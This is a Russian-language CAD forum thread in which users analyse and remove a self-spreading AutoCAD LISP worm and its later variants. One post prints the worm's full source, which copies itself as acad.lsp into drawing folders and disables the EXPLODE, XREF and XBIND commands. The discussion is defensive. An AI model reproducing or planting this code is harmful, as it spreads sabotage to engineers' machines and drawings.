|
||
| Правила | Регистрация | Пользователи | Поиск | Сообщения за день | Все разделы прочитаны | Справка по форуму | Файлообменник | |
|
![]() |
Поиск в этой теме |
![]() |
#1 | |
Вирус для Автокада
проектировшик
СССР
Регистрация: 01.01.2007
Сообщений: 5,149
|
||
Просмотров: 196167
|
|
||||
проектировшик Регистрация: 01.01.2007
СССР
Сообщений: 5,149
|
Если у кого есть возможность протестить данный вирус, или кто уже сталкивался с этим, просьба посочувст... ой поделиться решением проблемы :roll:
__________________
инженер проектировшик с опттом программа авто гад образование высшие |
|||
![]() |
|
||||
Регистрация: 11.10.2004
e•burg
Сообщений: 755
|
Симантек его видит и лечит - ничего страшного (скрипт).
ALS.Bursted.A |
|||
![]() |
|
||||
проектировшик Регистрация: 01.01.2007
СССР
Сообщений: 5,149
|
В архиве маленкий ЛИСП файлик просто
поюзать его, если знаешь лисп язык посмотреть, он сам по себе безобидный но только с ДВЖ файлами совместно не запускай
__________________
инженер проектировшик с опттом программа авто гад образование высшие |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Вот вам несколько вариантов лекарств:
1. Установить системную переменную ACADLSPASDOC в 0 2. В меню исправить вызовы с _xref, _explode, _xbind на _.xref, _.explode, _.xbind соответвенно 3. На кнопку повесить код типа: Код:
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Проектировщик свиноводство Регистрация: 21.08.2003
Сообщений: 2,291
|
Цитата:
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
> DEM : Ага, протянул. Правда, скорость хреноватая (немногим быстрее диалапа), но все лучше чем ничего.
Насчет опробовать - вот веришь, не до того!
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Регистрация: 25.12.2005
Москва
Сообщений: 13,627
|
Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.
|
|||
![]() |
|
||||
проектировшик Регистрация: 01.01.2007
СССР
Сообщений: 5,149
|
Цитата:
__________________
инженер проектировшик с опттом программа авто гад образование высшие |
|||
![]() |
|
||||
Ну вот текст этого файла, и кто скажет, что здесь вредоносного?
------------------------------------------------------------------------------ (defun s::startup(/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (setq path (findfile "base.dcl")) (setq path (substr path 1 (- (strlen path)8))) (setq mnlpath (getvar "menuname")) (setq nowdwg (getvar "dwgname")) (setq wjqm (findfile nowdwg)) (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg)))) (setq acadpath (findfile "acad.lsp")) (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8))) (setq ns1 "" ns2 "") (setq lspbj 0) (setq wjqm (strcat path "acad.lsp")) (if (setq wjm (open wjqm "r")) (progn (while (setq wz (read-line wjm)) (setq ns1 ns2) (setq ns2 wz) ) (if (> (strlen ns1) 14) (if (= (substr ns1 8 7) "acadapp") (setq lspbj 1) ) ) (close wjm) ) ) (if (and (= acadpath dwgpath) (/= acadpath path)) (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat path "acadapp.lsp")) (if (= lspbj 0) (progn (setq wjqm (strcat path "acad.lsp")) (setq wjm (open wjqm "a")) (write-line (strcat "(load" (chr 34) "acadapp" (chr 34)")") wjm) (write-line "(princ)" wjm) (close wjm) ) ) (writeapp) ) (progn (if (/= nowdwg "Drawing.dwg") (progn (setq oldacad (findfile "acadapp.lsp")) (setq newacad (strcat dwgpath "acad.lsp")) (writeapp) ) ) ) ) (command "undefine" "explode") (command "undefine" "xref") (command "undefine" "xbind") (setvar "cmdecho" old_cmd) (princ) ) (defun writeapp() (if (setq wjm1 (open newacad "w")) (progn (setq wjm (open oldacad "r")) (while (setq wz (read-line wjm)) (write-line wz wjm1) ) (close wjm) (close wjm1) ) ) ) (defun C:explode (/ p cont old_cmd) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (setq p(ssget)) (if p (progn (setq cont (sslength p)) (princ "\nSeltct objects:") (princ cont) (princ "found") (princ "\n") (princ cont) (princ "was not able to be explode") ) ) (setvar "cmdecho" old_cmd) (princ) ) (defun C:xref(/ old_cmd) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (command "insert") (setvar "cmdecho" old_cmd) (princ) ) -------------------------------------------------------------------------
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I |
||||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Эта "злая шутка, вырвавшаяся за пределы офиса", уже и до Казахстана дошла - мне оттуда с полгода назад примерно на это дело жаловались
![]()
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Хочу быть фотографом :) Регистрация: 21.10.2005
Москва, Кисловодск
Сообщений: 2,538
![]() |
Цитата:
Цитата:
Мне одно не очень понятно - теперь и фотографы увлекаются Автокадом? Так Фотошоп вроде удобней.. и РАВы понимает) =)) |
|||
![]() |
|
||||
CAD Регистрация: 28.08.2003
Киев
Сообщений: 1,834
![]() |
Да было уже это. Немного обсуждали.
http://www.autocad.ru/cgi-bin/f1/board.cgi?t=26139Fh
__________________
По теории майский жук летать не может. Но он этого не знает. И летает... |
|||
![]() |
|
||||
Цитата:
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I |
||||
![]() |
|
||||
проектировщик СС Регистрация: 13.02.2008
Москва
Сообщений: 230
|
Цитата:
|
|||
![]() |
|
||||
Я так и не понял, как вирус распостраняется? У нас постоянно он где-то проявляется - вывести не могут. Хотя антивирус его находит - но приходиться запускать чтоб весь комп проверил - он чтото удалит и все. Хочетелолсь бы знать как он распостраняется и как работает. Может есть ручная защита или ручное удаление. Антивирус долго гоняет и тормозит машину.
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Регистрация: 25.12.2005
Москва
Сообщений: 13,627
|
Цитата:
|
|||
![]() |
|
||||
Если я правильно понял "вирус" работает так:
Для начала нужен файл acadapp.lsp - он записывается в C:\Documents and Settings\user\Application Data\Autodesk\AutoCAD 2008\R17.1\enu\Support может програмно а може вручную. Потом вместе с файлом идет acad.lsp в котором есть копия этого acadapp.lsp. И при удалении acad.lsp он востанавливается и готов к применению. Т.е. "не зараженный " компутер запустив единожды acad.lsp делает копию acadapp.lsp. Так? ![]()
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Разобрался.
Для работы "вируса" нужен только файл acad.lsp (архив см. 1 посте) При запуске акада выполняется код который там прописан. Но главное это то что в папке Support появляются acad.lsp с кодом Код:
Ну и получается удаляй не удаляй из рабочей папки файл acad.lsp он всеравно восстановиться из acadapp.lsp Я конечно не америку открыл. Но во всяком случае схема понятна ![]()
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Про тот же вирус на caduser.ru
http://www.caduser.ru/cgi-bin/f1/board.cgi?t=39100wW 1. Если для своих задач не используешь acad.lsp, то в Тотал командоре ищешь все файлы acad.lsp и acadapp.lsp и удаляешь. 2. Редактируешь свое меню, перед переопределяемыми командами ставишь точку - вместо _EXPLODE - _.EXPLODE - вместо _XREF - _.XREF - вместо _XBIND - _.XBIND Точка перед именем команды вызывает оригинальную команду Автокада, даже если она была до этого 100 раз переопределена.
__________________
Как использовать код на Лиспе читаем здесь |
|||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Ну так примени п.1
__________________
Как использовать код на Лиспе читаем здесь |
|||
![]() |
|
||||
От вируса избавиться не проблема (мне во всяком случае). Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Moderator
Конструктор (машиностроение) Регистрация: 23.10.2006
Россия
Сообщений: 23,283
![]() |
|
|||
![]() |
|
||||
Вот решение от данного вируса. Но жаль от возможных модификаций не лечит.
Цитата:
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Ага, особенно
Цитата:
__________________
Как использовать код на Лиспе читаем здесь |
|||
![]() |
|
||||
Цитата:
![]()
__________________
*...И Случай, бог изобретатель. * |
||||
![]() |
|
||||
сферический конь в вакууме Регистрация: 02.05.2006
с Вологды
Сообщений: 307
![]() |
Знакомые поймали гдето "типа вирус" под акад, скорее просто злая шутка, на всех печатаемых чертежах в нижнем левом углу печатает на рыжем фоне Слово "Привет!!!" и улыбающуюся рожу. Никто не сталкивался?
![]()
__________________
Наша игра - Самая игра! :D |
|||
![]() |
|
||||
архитектор Регистрация: 10.08.2005
Ростов-на-Дону
Сообщений: 5,345
|
а можешь мне в почту его прислать , forxlam@yandex.ru?
![]() |
|||
![]() |
|
||||
архитектор Регистрация: 10.08.2005
Ростов-на-Дону
Сообщений: 5,345
|
мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Найти все эти файлы и уничтожить. Создать пустой файл acad.fas в каталоге, где находится acad.exe и дать ему свойство ReadOnly.
fas практически невозможно "вскрыть".
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Не разводи паникуMMH, этот вирус безобидный! Вот если его немного модифицировать... а возможно у тебя уже и модификация... В любом прочитай еще раз внимательно весь топик тут есть описание как избавиться от него раз и навсегда
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Регистрация: 29.07.2008
Сообщений: 19
|
все можно сделать проще. удаляете автокад в установке и удалении, потом ищете все файлы acaddoc в поиске с учетом системных и скрытых папок и удаляете все эти файлы. заново устанавливаете автокад и все нормально. только заново его не поймайте
|
|||
![]() |
|
||||
Natali m, не пиши никогда 2 раза одно и тоже сообщение. Какой код тебе нужно повесить на конопку? О чем ты ? Макрос? Что не получается? Что делаешь, чтобы получилось?
__________________
Поезд который устал от ржавого здравомыслия рельсов... |
||||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
проект Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113
|
Ну и еще проблема. Есть така штука в автокаде - ПУЛЬТ УПРАВЛЕНИЯ.
Так вот она очень удобна для работы в 3d пространстве(2008асаd) Я на этом пульте упраления делаю нужные себе панели упраления , ну и работаю. А когда закрываю автокад и сахожу заново, то пульт упраления пуст, приходится заново его настраивать. т.е. он не запоминает, а сначала все работало нормально (это как проблема с filedia (1)) Заранее С П А С И Б. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Последний пост не имеет никакого отношения к вирусу. Я, если честно, не очень понял: а что хотелось спросить-то?
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Регистрация: 29.10.2004
СПб
Сообщений: 16,379
|
Цитата:
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Гидрит вашу перекись! Это - НЕ ВИРУС!
В другой топик шагом марш!
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Архитектура Регистрация: 06.08.2007
Алматы
Сообщений: 15
|
А вот я опять про вирус. Как только удаляю все файлы LSP, открываю любой файл AutoCAD, они все тут же появляются снова. Как с этим бороться? И что конкретно сделать, чтобы AutoCAD открывал все файлы в одной программе? И кстати, то, что вы мне скинули про макросы, это прекрасно, мне понравилось, но у меня не вводятся команды именно с клавиатуры, а не с кнопки.
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Еще раз прочитать ветку - она недлинная.
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Регистрация: 18.02.2008
Сообщений: 143
|
Итак, то из-за чего начался весь сыр-бор еще в 2005 году появилось...
Эту шутку еще 5 и 6 касперы находили. Читаем А то что в посте №51 - это троян который вышел полтора-два месяца назад. если не ошибаюсь -китайского происхождения. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Ага, из 60-70 килобайт компилированного лиспа получить без малого метр ассемблероподобного кода - для меня это слишком. Вечером (после 22:00 Мск) постучись мне в аську - обсудим
![]()
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Проектировщик ВК. LISP-любитель. Регистрация: 15.12.2003
Москва
Сообщений: 1,202
![]() |
Мне последнее время частенько попадался этот т.н. вирус в присланных чертежах, только был он совсем безвредным, т.к. половина кода его была варварски стерта, а осталась только та, что ведала "размножением". Я говорю о старой версии lsp. В свое время написал такую штуку для защиты от этой пакости:
Код:
В качестве предложения - можно написать новый хороший вирус для борьбы с имеющимся плохим ![]() ![]() |
|||
![]() |
|
||||
ГАП Регистрация: 02.09.2008
Астана
Сообщений: 8
|
Решение проблемы по любым АвтоКад вирусам: http://dwg.ru/f/showthread.php?p=275205&
|
|||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Еще один вариант заразы Acaddoc.lsp вирус или нет?
__________________
Как использовать код на Лиспе читаем здесь |
|||
![]() |
|
||||
Інженер Регистрация: 19.05.2009
Київ
Сообщений: 7
|
Цитата:
Сам качать файл боюсь. :-Р Удачи ![]() |
|||
![]() |
|
||||
Регистрация: 12.04.2009
Сообщений: 94
|
Мой ответ относится к следующим сообщениям
Цитата:
Цитата:
http://www.virustotal.com/ru/analisi...0c5-1278857854 http://www.virustotal.com/ru/analisi...3f2-1278858704 |
|||
![]() |
|
||||
Регистрация: 17.06.2009
Сообщений: 10
|
Цитата:
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Не хз, а почитать FAQ по AutoCAD
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Регистрация: 22.12.2009
Новосибирск
Сообщений: 29
|
Цитата:
Замечена пока одна проблема как и у скрипта - если есть сетевые диски, их надо отключить перед проверкой. В отличии от скрипта - нет необходимости запускать с консоли, чтобы увидеть что именно было удалено/очищено. ps: сборка для net.3.5 (если установлен AutoCad 2010 и дальше, то этот fw уже установлен) |
|||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Набрел на следующие рекомендации AUTODESK How to detect and remove the Acad.vlx virus
Тема на другом форуме про вирус acad viruse Там выложена программа KillWorm для очистки заразы из Acaddoc.lsp вирус или нет? (та, которая (setq flagx t)) Опции Цитата:
KillWorm142.lsp
__________________
Как использовать код на Лиспе читаем здесь Последний раз редактировалось VVA, 27.02.2015 в 23:18. |
|||
![]() |
|
||||
Регистрация: 26.09.2011
Сообщений: 3
|
Цитата:
Как бороться - Удалить все acad.lsp c машины. И вместо них записать все необходимые acad.lsp с указанным атрибутом ONLY READ В этом случае вирус не залезает. Кстати Вирусом он закидаваеся также в папку C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 200ххх\... Здесь тоже создать такой only-read файл acad.lsp. На данный момент AVAST этот вирус лечит |
|||
![]() |
|
||||
Moderator
Конструктор (машиностроение) Регистрация: 23.10.2006
Россия
Сообщений: 23,283
![]() |
weltwelt, Капитан, это Вы?!
![]() |
|||
![]() |
|
||||
САПР Регистрация: 29.09.2011
СПб
Сообщений: 283
|
Объявилась слегка модифицированная версия обсуждаемого файла. Выглядит как:
acad.lsp Код:
anti.lsp Код:
[HKEY_CURRENT_USER\Software\Autodesk\AutoCAD\R18.1\ACAD-9000:419\Profiles\"текущий_профиль"\Dialogs\Appload\Startup] "NStartup"="путь к файлу\\anti.LSP" "NumStartup"="N" "текущий профиль" - значение по умолчанию ключа profile если файлы в автозагрузке уже есть, то этот будет последним и NumStartup увеличится на единицу. Последний раз редактировалось ciril, 13.10.2011 в 12:13. Причина: выдает ошибку на незараженном компе |
|||
![]() |
|
||||
каменщик Регистрация: 28.09.2011
Южный Урал
Сообщений: 120
|
Появилась такая проблема после копирования объекта и его расчленении. Когда просто открывался ничего не было, а как скопировал себе объект и расчленил, перестал сохранять и сохранять как. Файл из Данлоада dnl5450_Shemy_stropovok_gruzov_v_pomocsh_PPRcshikam_
Воспользовался с поста 87 (спасибо!), теперь сохраняет, а сохранить как не "хотит", пишет "Неправильное имя файла". Самое обидное что надо по диплому распечатывать и работать ![]() |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Этот вирус лечится изменением драйвера hands.sys
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
каменщик Регистрация: 28.09.2011
Южный Урал
Сообщений: 120
|
|
|||
![]() |
|
||||
Moderator
Конструктор (машиностроение) Регистрация: 23.10.2006
Россия
Сообщений: 23,283
![]() |
Цитата:
Всегда Ваш Капитан Очевидность |
|||
![]() |
|
||||
Вода - моя работа Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638
|
filedia в 1,
нормальное имя файлу давать, чертёж от шелухи очистить, Сохранить чертёж, скопировать в проводнике и переименовать, Скопировать файл автосохранения, Биться головой о стену пока не полегчает.
__________________
Нерешаемых проблем не бывает. |
|||
![]() |
|
||||
Регистрация: 16.10.2009
Сообщений: 47
|
А у меня такая проблема копируешь линию определеное количество раз ,ну допустем 8 так вот с последней скопированой линеей можно работать ,а с предыдущими ничего не зделать они заблокированы,но все это лечиться закрытием и последующим открытием файла,вопрос что это? спасибо за ответ
|
|||
![]() |
|
||||
Обнаружен вирус, похищавший чертежи AutoCAD.
Цитата:
|
||||
![]() |
|
||||
MCAD« ACAD / Medre . A представляет собой интересный случай промышленного шпионажа, вредоносная программа отслеживает появление новых чертежей на компьютерах зараженных пользователей и автоматически отправляет их на почту злоумышленникам, - комментирует Александр Матросов, директор Центра вирусных исследований и аналитики российского представительства ESET. - Такие хищения могут нанести серьезный материальный ущерб не только государственным учреждениям, но и просто владельцам интеллектуальной собственности, поскольку киберпреступники получают доступ к проектам еще до их запуска в производство. Они даже могут успеть получить патент на новый продукт до того, как создатели обратятся в патентное бюро».
вирус не причём!
__________________
С уважением sbi |
||||
![]() |
|
||||
|
||||
![]() |
|
||||
Регистрация: 29.10.2004
СПб
Сообщений: 16,379
|
Цитата:
http://forum.dwg.ru/showpost.php?p=962002&postcount=89 Последний раз редактировалось Хмурый, 27.08.2012 в 19:02. |
|||
![]() |
|
||||
я в курсе, поэтому и пишу - ждать...
![]()
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome: |
||||
![]() |
|
||||
геология, геодезия Регистрация: 29.05.2009
Хабаровск
Сообщений: 185
|
Делаю работу для одной конторы. Там в каждой папке с чертежами dwg сидят acad.lsp Даже бесплатная Авира орет о вирусне и предлагает их удалить. У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"? Код прилагаю:
Код:
|
|||
![]() |
|
||||
Код приведен не полностью, но уже видно, что идет переопределение команды EXPLODE. Кто-то пытался, наверное, защитить свои блоки от расчленения
![]() |
||||
![]() |
|
||||
геология, геодезия Регистрация: 29.05.2009
Хабаровск
Сообщений: 185
|
Цитата:
Цитата:
|
|||
![]() |
|
||||
А тебе не всё ли равно, или просто заняться нечем? Ответили ведь уже: выбрось это в ведро и не парь себе и другим мозг.
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome: |
||||
![]() |
|
||||
геология, геодезия Регистрация: 29.05.2009
Хабаровск
Сообщений: 185
|
Мне это, уважаемый легковозбудимый, для админов, которые похоже не ухом не рылом что это за "lsp" и чем оно плохо. Объяснить им развернуто почему надо почистить сеть. Потому как обленились и не хотят лишних телодвижений. Доходчиво? Водички выпей - успокоешься...
|
|||
![]() |
|
||||
геология, геодезия Регистрация: 29.05.2009
Хабаровск
Сообщений: 185
|
Кажется мне покурочили его и бросили. Не похож он на остальные подобные "вирусы" выложенные сдесь. По отзывам трудящихся никаких нареканий на работу Acada не было. "У нас всегда так было, значит так надо"! Хотя не факт что в других конторах использующих эти файлы все гладко. Чистить надо однозначно, как - описано выше, только надо знать что конкретно этот файл пытается сделать при запуске программы.
|
|||
![]() |
|
||||
строю, ломаю Регистрация: 03.04.2008
Украина
Сообщений: 5,515
|
Krovlaf, что в командной строке автокада пишется при загрузке? Этот вирус размножает себя путем копирования содержимого в файлы аcad.lsp в папке с текущим чертежом... то, что там не дописано, возможно работа антивируса, который заблокировал файл при чтении-записи, но подранок еще живет, и размножается
|
|||
![]() |
|
||||
геология, геодезия Регистрация: 29.05.2009
Хабаровск
Сообщений: 185
|
Командная строка при запуске:
Цитата:
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Еще одна версия (вроде ссылка должна быть доступна всем) http://forum.inoe.name/showpost.php?...18&postcount=9
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
BIM, С#, AutoCAD, LISP Регистрация: 15.03.2006
Дуброво
Сообщений: 657
|
Прошу прощения, если где уже было - прочитал уже несколько тем, но так и не нашёл ответа.
У меня чистая машина. Правильно ли я понимаю, что при снятой галке с пункта "Загружать acad.lsp c каждым чертежом" этот вирус мне не страшен?
__________________
"Молодой человек, Вы не представляете всей широты поставленной перед Вами задачи." © Панкратова Г.Е. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
kha, если у тебя ACAD версии до 2013 - страшен
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
BIM, С#, AutoCAD, LISP Регистрация: 15.03.2006
Дуброво
Сообщений: 657
|
да, автокад 2012
каким образом тогда вирус заражает автокад, если я отключил эту опцию? Нашёл вот этот метод: http://bushman-andrey.blogspot.ru/20...p-acadfas.html пробовал кто-нибудь?
__________________
"Молодой человек, Вы не представляете всей широты поставленной перед Вами задачи." © Панкратова Г.Е. Последний раз редактировалось kha, 07.10.2014 в 17:35. |
|||
![]() |
|
||||
Вместо acad.lsp в каждый документ при открытии грузится как минимум acaddoc.lsp.
__________________
Сообщество программистов Autodesk в СНГ - техническая поддержка |
||||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
http://adn-cis.org/posledovatelnost-...v-autocad.html + http://adn-cis.org/autocad-autoload-security.html
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
BIM, С#, AutoCAD, LISP Регистрация: 15.03.2006
Дуброво
Сообщений: 657
|
Цитата:
Проверил, загружается, зараза. Благодарю за разъяснения.
__________________
"Молодой человек, Вы не представляете всей широты поставленной перед Вами задачи." © Панкратова Г.Е. Последний раз редактировалось kha, 12.10.2014 в 03:58. |
|||
![]() |
|
||||
инженер проектировщик Регистрация: 27.09.2010
Москва
Сообщений: 47
|
Как бороться с этим файлом я так и не понял. Появляется и все тут
![]() После эксперимента понял следующее..... "Здоровый" компьютер заражается после открытия файла с чертежом. Заражение происходит в том случае, если в папке с чертежом находилась скрытая вредоносная программа acaddoc.fas. После открытия, происходит автоматическая загрузка файла acaddoc.fas в память приложения autocad и подмена некоторых файлов автокада в папке Support в профиле пользователя. Например в загруженных программах сразу будет видно, что в память подгружается файл acaddoc.fas и подмененный файл acad.mnl.fas. Далее зараженный автокад будет клонировать вредоносную прогу acaddoc.fas на каждом открытом чертеже. Причем после заражения - файл acaddoc.fas автоматически восстанавливается на всех папках и дисках, если они ранее были удалены. Простая переустановка не поможет полагаю ну или делать это нужно одномоментно на всех компах. где стоит полная версия автокада, а до этого везде уничтожить файл acaddoc.fas. Последний раз редактировалось Mixon2010, 27.02.2015 в 12:07. |
|||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Mixon2010, Заархивируй в zip или rar и выкладывай сюда для препарации
__________________
Как использовать код на Лиспе читаем здесь |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Я подправил первый пост темы.
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Инжинегр Регистрация: 09.12.2011
Сообщений: 433
|
|
|||
![]() |
|
||||
инженер проектировщик Регистрация: 27.09.2010
Москва
Сообщений: 47
|
|
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Начальный пост темы прочитай - там полно рецептов
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Инженер LISP Регистрация: 11.05.2005
Минск
Сообщений: 6,996
|
Цитата:
__________________
Как использовать код на Лиспе читаем здесь |
|||
![]() |
|
||||
Строительство гидротехнических сооружений Регистрация: 01.08.2012
Москва
Сообщений: 8,882
|
Цитата:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить после этого файлы acaddoс.fas снова не появляются |
|||
![]() |
|
||||
Регистрация: 23.02.2012
Сообщений: 221
|
Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?
----- добавлено через ~3 мин. ----- А если появляются? |
|||
![]() |
|
||||
Строительство гидротехнических сооружений Регистрация: 01.08.2012
Москва
Сообщений: 8,882
|
Цитата:
![]() у себя вычистил данным способом - больше не появляется. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Сергей Юрьевич, тебе повезло: у тебя стандартные файлы acad*.lsp не были заражены. rtyu, читай все ссылки из #1 - там полно вариантов.
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Регистрация: 23.02.2012
Сообщений: 221
|
А у меня ребята такая проблема. Значит имеются 3 компьютера на них установлены Windows XP и Автокад 2008. Как-то проходя мимо их я заметил, что у них не правильно установлено время, а именно год 2013, у кого и 2014. Вообщем естественно я их поменял на правильное т.е 2015 год. После этого пользователи начали запускать файлы в Автокаде и к моему удивлению в чертежах начал дорисовываться вот такой вот "алигафрен" (см.скриншот.) Я уже молчу зато, что появляются acaddoc.fas. Стоит антивирус AVG 2015 у которого к сожалению разработчики не додумались прописать проверку файлов lsp, поэтому мне пришлось сделать это самому вручную, как только я это сделал антивирус начал удалять acad.lsp. Что самое интересное, что если системную дату поставить опять не правильную, то в файле ничего не рисуется т.е файл открывается так как надо и ничего стороннего не рисуется.
Скриншот выкладываю |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
rtyu, тебе своей отдельной темы мало? http://forum.dwg.ru/showthread.php?t=119584
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
строю, ломаю Регистрация: 03.04.2008
Украина
Сообщений: 5,515
|
я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154 |
|||
![]() |
|
||||
Administrator
Регистрация: 21.08.2003
